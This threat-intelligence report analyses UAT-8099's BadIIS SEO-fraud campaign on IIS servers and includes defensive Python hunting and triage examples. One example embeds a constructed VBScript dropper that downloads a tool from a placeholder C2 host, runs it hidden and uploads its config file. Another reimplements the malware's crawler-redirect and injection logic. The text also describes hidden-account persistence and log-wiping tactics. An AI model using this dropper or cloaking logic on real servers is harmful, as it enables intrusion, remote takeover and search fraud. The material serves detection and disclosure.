UAT-8099 Resurfaces With Region-Targeted BadIIS Campaign Across Southeast Asia

We observed renewed activity associated with UAT-8099 beginning in August 2025 and continuing through early 2026. Analysis of file telemetry and DNS traffic indicates that compromised IIS servers are distributed across India, Pakistan, Thailand, Vietnam, and Japan, with a particularly heavy concentration of activity in Thailand and Vietnam. This activity also shows significant overlap with the WEBJACK campaign. We identified high-confidence correlations across malware hashes, command-and-control (C2) infrastructure, victimology, and the gambling sites being promoted, suggesting a shared or closely related operational ecosystem.

While the threat actor continues to rely on web shells, SoftEther VPN, and EasyTier to manage compromised IIS servers, their operational approach has evolved notably. First, the latest campaign reflects a shift in black-hat SEO tactics from broad, global targeting to a more narrowly defined regional focus. Second, the actor increasingly abuses red-team utilities and legitimate tools to evade detection and establish long-term persistence.


Infection chain

After obtaining initial access, the threat actor executes standard reconnaissance commands such as whoami and tasklist to collect basic system information. They then deploy VPN tooling and establish persistence by creating a local user account named “admin$”; the trailing “$” keeps the account out of the standard net user listing, which is why the report describes it as hidden.

UAT-8099 has expanded its tooling set with several new components:

  • Sharp4RemoveLog
    A .NET utility designed to clear all Windows event logs, effectively removing forensic evidence.
  • CnCrypt Protect
    A Chinese-language file protection utility. In this campaign, it is abused to conceal malicious files and enable DLL redirection. This tool has been associated with IIS-based attacks since 2024, including SEO fraud campaigns targeting Vietnam and China, as well as the WEBJACK campaign.
  • OpenArk64
    An open-source anti-rootkit tool. The actor abuses its kernel-level access to terminate security product processes that are otherwise protected from termination.
  • GotoHTTP
    An online remote-control tool. The actor deploys this tool using VBScript to remotely control compromised servers. Additional details are provided later in this report.

Following these steps, the actor deploys two archive files containing the latest version of the BadIIS malware. Notably, the archive filenames correspond directly to the geographic regions targeted by the malware—for example, “VN” for Vietnam and “TH” for Thailand.

C:/Users/admin$/Desktop/TH.zip
C:/Users/admin$/Desktop/VN.zip

Following the publication of earlier research, security products broadly began flagging the “admin$” account name. When that account is blocked, the threat actor creates a second hidden account named “mssql$” (the profile name that appears in the staging paths below) to retain access and continue operating the BadIIS SEO fraud service.

Using this new account, the actor redeploys an updated BadIIS payload. This marks a clear shift from indiscriminate global targeting to region-specific deployments, reflected in directory naming conventions such as “VN” for Vietnam and “newth” for Thailand.

C:/Users/mssql$/Desktop/VN/fasthttp.dll
C:/Users/mssql$/Desktop/VN/cgihttp.dll
C:/Users/mssql$/Desktop/VN/install.bat
C:/Users/mssql$/Desktop/VN/uninstall.bat
C:/Users/mssql$/Desktop/newth/iis32.dll
C:/Users/mssql$/Desktop/newth/iis64.dll
C:/Users/mssql$/Desktop/newth/install.bat
C:/Users/mssql$/Desktop/newth/uninstall.bat

The actor also attempted to create additional hidden accounts to reinforce persistence.
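A hunt for the persistence pattern just described, written here as an added example rather than taken from the report: it flags Security event 4720 (user account created) records whose account name ends in “$”, and file creates that land under such a profile's Desktop with the staging names seen above. The event records are constructed to mimic Security 4720 and Sysmon event 11 (FileCreate) fields; the account and path names are the ones from the report, the SubjectUserName values are assumed.

```python
"""Hunt for '$'-suffixed local accounts and BadIIS staging under their profiles.
Added example, not code from the report. Computer accounts legitimately end in
'$' but are created as event 4741, so a 4720 with that suffix is anomalous."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "admin$",
     "SubjectUserName": r"iis apppool\defaultapppool"},          # assumed subject
    {"EventID": 4720, "TargetUserName": "svc_backup",
     "SubjectUserName": "Administrator"},                          # benign control
    {"EventID": 4720, "TargetUserName": "mssql$",
     "SubjectUserName": "admin$"},                                 # assumed subject
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\mssql$\Desktop\newth\iis64.dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Users\mssql$\Desktop\newth\install.bat"},
    {"EventID": 11, "Image": r"C:\Program Files\Git\bin\git.exe",
     "TargetFilename": r"C:\Users\dev\source\repos\site\bin\Release\app.dll"},  # benign control
]

# A user name (no domain part) that ends in '$'.
HIDDEN_ACCOUNT = re.compile(r"^[^\\]+\$$")
# Anything under C:\Users\<name>$\Desktop\..., capturing the profile and the leaf file name.
STAGING_PATH = re.compile(r"^C:\\Users\\([^\\]+\$)\\Desktop\\(?:.*\\)?([^\\]+)$", re.IGNORECASE)
# Leaf names that match the staging layout from the report (archives, module DLLs, installers).
STAGING_FILES = re.compile(r"^(?:install|uninstall)\.bat$|\.(?:dll|zip)$", re.IGNORECASE)


def hunt(events):
    """Return (rule, value) findings in event order."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 4720 and HIDDEN_ACCOUNT.match(ev.get("TargetUserName", "")):
            findings.append(("hidden_account_created", ev["TargetUserName"]))
        elif ev.get("EventID") == 11:
            m = STAGING_PATH.match(ev.get("TargetFilename", ""))
            if m and STAGING_FILES.search(m.group(2)):
                findings.append(("staging_under_hidden_profile", ev["TargetFilename"]))
    return findings


if __name__ == "__main__":
    for rule, value in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {value}")
```

Because net user hides the account, verify hits with Get-LocalUser or a direct SAM enumeration rather than the net command, and check whether the IIS application pool identity (rather than an administrator) created the account, which is what a web-shell-driven creation would look like.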


Abuse of the GotoHTTP remote-control tool

Multiple instances were observed in which UAT-8099 used a web shell to execute PowerShell commands that downloaded and executed a malicious VBScript. This script deploys the GotoHTTP tool and exfiltrates the gotohttp.ini configuration file to the C2 server. This enables the actor to retrieve the connection ID and password required to remotely control the compromised server.

The VBScript contains multiple functions annotated with Simplified Chinese and Pinyin comments. A breakdown of these functions follows.

The script begins by initializing key parameters such as download and upload URLs, file paths, and the expected file size of gotohttp.exe. This section is labeled “dingyichangliang” (定义常量 – Define Constants).

The first functional block, labeled “xiazaiwenjian” (下载文件 – Download File), uses an HTTP GET request to download the GotoHTTP executable and save it to the public directory as xixixi.exe.

The second and third blocks, labeled “jianchawenjian” (检查文件 – Check File) and “jianchawenjian daxiao” (检查文件大小 – Check File Size), validate the presence and size of the downloaded file. If validation fails, the script reports errors to the C2 server:

  • “xiazaishibai” (下载失败 – Download failed)
  • “daxiaobudui” (大小不对 – Incorrect size)

The fourth and fifth blocks, labeled “zhixingwenjian” (执行文件 – Execute File) and “jianchajieguo” (检查结果 – Check Result), execute the tool in a hidden window without waiting for completion. The script uses Chr(34) to represent quotation marks, avoiding syntax errors caused by improper escaping.

After a five-second delay, the script attempts to upload gotohttp.ini to the C2 server. If the file does not exist, it sends the error “gotohttp.ini bucunzai” (gotohttp.ini 不存在 – File does not exist).

The final block, labeled “qingli” (清理 – Clean), releases and cleans up all COM objects.
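Stage-based triage for a VBScript dropper of the kind described in this section, as an added example (not the actor's script and not the report's). Each stage is a regex for the COM calls the text attributes to the script: XMLHTTP download, ADODB.Stream save, file-size check, hidden Run via WScript.Shell, and a POST of gotohttp.ini. SAMPLE_SCRIPT is constructed to exercise those stages; its URLs, paths and the baogao helper are invented, only the block labels come from the report.

```python
"""Triage a VBScript for the download -> size-check -> hidden-run -> config-exfil
chain. Added example; the sample script below is constructed, not recovered."""
import re

SAMPLE_SCRIPT = r'''
' dingyichangliang
xiazaiURL = "http://c2.example.invalid/gotohttp.exe"
shangchuanURL = "http://c2.example.invalid/up"
exePath = "C:\Users\Public\xixixi.exe"
iniPath = "C:\Users\Public\gotohttp.ini"
qiwangdaxiao = 4096
' xiazaiwenjian
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", xiazaiURL, False
http.Send
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write http.responseBody
stream.SaveToFile exePath, 2
' jianchawenjian daxiao
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.GetFile(exePath).Size <> qiwangdaxiao Then baogao "daxiaobudui"
' zhixingwenjian  (window style 0 = hidden, False = do not wait)
Set shell = CreateObject("WScript.Shell")
shell.Run Chr(34) & exePath & Chr(34), 0, False
WScript.Sleep 5000
If fso.FileExists(iniPath) Then
  http.Open "POST", shangchuanURL, False
  http.Send fso.OpenTextFile(iniPath).ReadAll
Else
  baogao "gotohttp.ini bucunzai"
End If
' qingli
Set http = Nothing
'''

# Every pattern in a stage must match for the stage to count.
STAGES = {
    "download": [r"MSXML2\.(?:Server)?XMLHTTP", r'\.Open\s+"GET"'],
    "save_to_disk": [r"ADODB\.Stream", r"\.SaveToFile\b"],
    "size_check": [r"\.Size\s*(?:<>|=|<|>)"],
    "hidden_execute": [r"WScript\.Shell", r"\.Run\s+.*,\s*0\s*,\s*False"],
    "config_exfil": [r'\.Open\s+"POST"', r"gotohttp\.ini"],
}
# Weak, campaign-specific markers: Chr(34) quoting and the Pinyin block labels from the report.
WEAK_MARKERS = [
    r"Chr\(34\)",
    r"\b(?:dingyichangliang|xiazaiwenjian|jianchawenjian|zhixingwenjian|jianchajieguo|qingli)\b",
]


def triage(script: str):
    """Return (matched_stages, weak_marker_hits, verdict)."""
    matched = [name for name, pats in STAGES.items()
               if all(re.search(p, script, re.IGNORECASE) for p in pats)]
    weak = sum(1 for p in WEAK_MARKERS if re.search(p, script))
    core = {"download", "hidden_execute", "config_exfil"}
    verdict = "download-execute-exfil" if core <= set(matched) else "benign-or-partial"
    return matched, weak, verdict


if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```

The verdict keys on the three behaviours that make the script dangerous regardless of which remote-control tool it fetches; the Pinyin labels and Chr(34) idiom only raise confidence, since an operator can rename both in minutes.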


Two new BadIIS malware clusters targeting specific regions

Since September 2025, two new BadIIS variants have been observed in active SEO fraud campaigns. This analysis is based on reverse engineering and infection-chain telemetry. We assess that UAT-8099 customizes these BadIIS clusters for region-specific targeting.

  • BadIIS IISHijack
    Named after the original malware filename.
  • BadIIS asdSearchEngine
    Named after PDB strings found in the sample (the directory name 原生DLL means “native DLL”):
    E:\原生DLL\SearchEngine\Release\SearchEngine.pdb
    C:\Users\qwe\source\repos\Dll1dasd\x64\Release\Dll1dasd.pdb

BadIIS IISHijack

This variant primarily targets Vietnam. It explicitly embeds the country code within its source code and creates a dedicated directory when deployed.

BadIIS asdSearchEngine

This variant targets Thailand and users whose browser language preference is Thai. Implemented as an IIS native module, it handles CHttpModule::OnBeginRequest and inspects the incoming HTTP headers, including User-Agent, Referer, and Accept-Language, to decide how to respond.

If the requested path contains extensions from an exclusion list, the request is ignored to preserve static resources. If the User-Agent matches a known crawler (e.g., Googlebot, sogu, 360spider, or Baiduspider), the request is redirected to an SEO fraud site. If the visitor is a regular user and the Accept-Language header indicates Thai, the malware injects HTML containing a malicious JavaScript redirect.

Three distinct variants were identified within this cluster. They share a common workflow, but each has unique features. Some variants obfuscate their C2 configuration data and injected HTML with a single-byte XOR (key 0x7A); this is trivially reversible and should not be mistaken for encryption.


Exclusive multiple-extensions variant

This variant filters requests based on file extensions before executing its payload. The filtering serves three purposes:

  1. Preserve site integrity
    Extensions such as .png, .jpg, .css, .js, .woff, .ttf, .eot, and .otf are excluded to avoid breaking site appearance and functionality.
  2. Focus SEO manipulation
    Document and web-related extensions (e.g., .pdf, .json, .robots, .sitemap) are filtered so injections target content that influences SEO rankings.
  3. Conserve resources
    Archive formats (.zip, .rar, .7z, .tar, .gz) are ignored.

Dynamic page / directory index variant

Another variant validates whether the requested path corresponds to a dynamic page extension or a directory index. Only qualifying requests are routed through the malicious processing logic.

This design prioritizes SEO effectiveness while maintaining stealth. By focusing on dynamic pages frequently crawled by search engines, the malware avoids interfering with static assets and reduces the likelihood of generating suspicious server-side errors.
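The request-handling logic of the asdSearchEngine cluster and the two gating styles just described, reimplemented in Python as an added example (not the malware's code and not the report's). The crawler list, the extension exclusion list, the Thai-language check and the single-byte XOR (0x7A) obfuscation are taken from the text; the C2 landing URL, the injected snippet and the list of dynamic-page extensions are constructed assumptions, and the config is encoded at import time only so that the decode path is exercised.

```python
"""asdSearchEngine-style request dispatch: gate -> crawler redirect -> Thai inject -> pass.
Added example; see lead-in for which values are assumed."""
import posixpath
from urllib.parse import urlsplit

XOR_KEY = 0x7A


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is symmetric: the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


# A real sample carries these fields XOR-encoded in its data section; the plaintext here is assumed.
ENCODED_CONFIG = {
    "seo_site": xor_bytes(b"https://seo.example.invalid/landing"),
    "inject_html": xor_bytes(b'<script src="https://seo.example.invalid/r.js"></script>'),
}
CONFIG = {name: xor_bytes(blob).decode() for name, blob in ENCODED_CONFIG.items()}

# Exclusion list of the "multiple-extensions" variant (from the report).
EXCLUDED_EXT = {
    ".png", ".jpg", ".css", ".js", ".woff", ".ttf", ".eot", ".otf",
    ".pdf", ".json", ".robots", ".sitemap",
    ".zip", ".rar", ".7z", ".tar", ".gz",
}
# Assumed dynamic-page extensions for the "dynamic page / directory index" variant.
DYNAMIC_EXT = {".asp", ".aspx", ".ashx", ".php", ".jsp", ".cgi"}
# Crawler substrings from the report, matched case-insensitively against User-Agent.
CRAWLERS = ("googlebot", "sogu", "360spider", "baiduspider")


def _ext(path: str) -> str:
    return posixpath.splitext(urlsplit(path).path)[1].lower()


def passes_gate(path: str, gate: str) -> bool:
    """'exclude': skip static/archive extensions; 'dynamic': only dynamic pages or directory indexes."""
    if gate == "exclude":
        return _ext(path) not in EXCLUDED_EXT
    if gate == "dynamic":
        return _ext(path) in DYNAMIC_EXT or urlsplit(path).path.endswith("/")
    raise ValueError(f"unknown gate {gate!r}")


def wants_thai(accept_language: str) -> bool:
    """True if any Accept-Language tag is Thai (th or th-*); q-values are ignored."""
    for part in accept_language.split(","):
        tag = part.split(";")[0].strip().lower()
        if tag == "th" or tag.startswith("th-"):
            return True
    return False


def classify(path: str, headers: dict, gate: str = "exclude"):
    """Return (action, detail) with action in ignore / redirect / inject / pass."""
    h = {k.lower(): v for k, v in headers.items()}
    if not passes_gate(path, gate):
        return ("ignore", None)
    ua = h.get("user-agent", "").lower()
    if any(c in ua for c in CRAWLERS):          # search engine: poison the index
        return ("redirect", CONFIG["seo_site"])
    if wants_thai(h.get("accept-language", "")):  # Thai visitor: inject the JS redirect
        return ("inject", CONFIG["inject_html"])
    return ("pass", None)                          # everyone else sees the real page


if __name__ == "__main__":
    print(classify("/index.aspx", {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1)"}))
    print(classify("/index.aspx", {"User-Agent": "Mozilla/5.0", "Accept-Language": "th-TH,th;q=0.9"}))
```

The ordering matters for detection: a crawler never receives the injected HTML and a browser never receives the 3xx, so a single curl with a normal User-Agent and an English Accept-Language shows a clean page. Replaying the same URL with a Googlebot User-Agent, and again with Accept-Language: th, is the cheapest way to surface either branch on a server you suspect.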


HTML template loading variant

The final variant includes an HTML template generation system. It first attempts to load templates from disk; if none are found, it falls back to an embedded template. Placeholders are populated with randomized content, URLs, and timestamps. The placeholder names are written in Chinese Pinyin, which makes it easy to see how keywords are programmatically inserted to support SEO fraud.

Template variables

Head section

  • {biaoti} (标题 – title): Page title
  • {shoudongmiaoshu} (手动描述 – manual description): Meta description
  • {guanjianci} (关键词 – keywords): Meta keywords

Body section

  • <h1>Welcome to {biaoti}</h1>
  • {shoudongmiaoshu} paragraph
  • {gudinglianjie} (固定链接 – permalink)
  • {riqi} (日期 – date)
  • {suijirenming1} (随机人名 – random name)
  • {suijiduanluo1} (随机段落 – random paragraph)

The keywords promoted by UAT-8099 are hardcoded within the malware and dynamically inserted into generated pages to facilitate SEO fraud.


Linux BadIIS variant identified on VirusTotal

An ELF (Linux) variant of BadIIS was also identified on VirusTotal. Its functionality mirrors previously documented versions, including proxy, injector, and SEO fraud modes. The hardcoded C2 domain matches infrastructure previously attributed to UAT-8099, enabling high-confidence attribution.

The URL path targeting pattern remains consistent with prior campaigns:

news|cash|bet|gambling|betting|casino|fishing|deposit|bonus|sitemap|app|ios|video|games|xoso|dabong|nohu

Unlike earlier versions, this ELF variant targets only three search engines:

User-Agent    Referer
Googlebot     google
Bingbot       bing
Yahoo!        yahoo
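A cloaking probe built from this variant's crawler table and path pattern, as an added example (not the malware's code and not the report's). It produces the request personas a defender would replay against their own site and flags any crawler persona whose response diverges from a plain-browser baseline, either by redirecting off-site or by returning substantially different visible text. The full User-Agent strings are assumed (the variant only needs the substring from the table), and the responses below are constructed; a real run would feed in what curl or urllib actually returned.

```python
"""Detect crawler-conditional cloaking of the kind the ELF variant performs.
Added example; PERSONAS and SAMPLE_RESPONSES are constructed."""
import difflib
import re
from urllib.parse import urlsplit

# Path substrings the variant reacts to (from the report). Plain substring match,
# so "/happy" trips "app" just as "/app/" does.
TARGET_PATH = re.compile(
    r"news|cash|bet|gambling|betting|casino|fishing|deposit|bonus|sitemap|app|ios|video|games|xoso|dabong|nohu",
    re.IGNORECASE,
)

# User-Agent / Referer pairs from the table; full strings are assumed.
PERSONAS = {
    "baseline": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Referer": ""},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1)", "Referer": "https://www.google.com/"},
    "bingbot": {"User-Agent": "Mozilla/5.0 (compatible; Bingbot/2.0)", "Referer": "https://www.bing.com/"},
    "yahoo": {"User-Agent": "Mozilla/5.0 (compatible; Yahoo! Slurp)", "Referer": "https://search.yahoo.com/"},
}


def is_target_path(path: str) -> bool:
    return TARGET_PATH.search(urlsplit(path).path) is not None


def visible_text(html: str) -> str:
    """Strip tags and collapse whitespace so markup shared by every page does not mask a swap."""
    return " ".join(re.sub(r"<[^>]+>", " ", html).split())


def detect_cloaking(responses: dict, site_host: str, threshold: float = 0.6):
    """responses: persona -> (status, location, body). Returns [(persona, reason)] for
    every non-baseline persona whose response diverges from the baseline."""
    base_status, _, base_body = responses["baseline"]
    base_text = visible_text(base_body)
    findings = []
    for persona, (status, location, body) in responses.items():
        if persona == "baseline":
            continue
        if 300 <= status < 400 and location:
            target = (urlsplit(location).hostname or site_host).lower()
            if target != site_host.lower():
                findings.append((persona, f"off-site redirect to {target}"))
                continue
        if status != base_status:
            findings.append((persona, f"status {status} vs baseline {base_status}"))
            continue
        ratio = difflib.SequenceMatcher(None, base_text, visible_text(body)).ratio()
        if ratio < threshold:
            findings.append((persona, f"visible-text similarity {ratio:.2f} below {threshold}"))
    return findings


# Constructed responses for a probe of /news/ on a hypothetical site.
_CLEAN = "<html><title>Company News</title><body><h1>Company News</h1><p>Quarterly update.</p></body></html>"
SAMPLE_RESPONSES = {
    "baseline": (200, None, _CLEAN),
    "googlebot": (302, "https://seo.example.invalid/land", ""),
    "bingbot": (200, None, "<html><title>nohu casino bonus</title><body><h1>Welcome to nohu casino</h1>"
                           "<p>Register today for a deposit bonus and play xoso, dabong and slot games.</p></body></html>"),
    "yahoo": (200, None, _CLEAN),
}


if __name__ == "__main__":
    if is_target_path("/news/"):
        for persona, reason in detect_cloaking(SAMPLE_RESPONSES, "www.example.invalid"):
            print(f"{persona}: {reason}")
```

Send every persona from the same source address within a few seconds of each other, because the proxy and injector modes described earlier can also key on the client; any divergence in a crawler persona on a path that is_target_path accepts is the signal to pull the module list and the binary from that host.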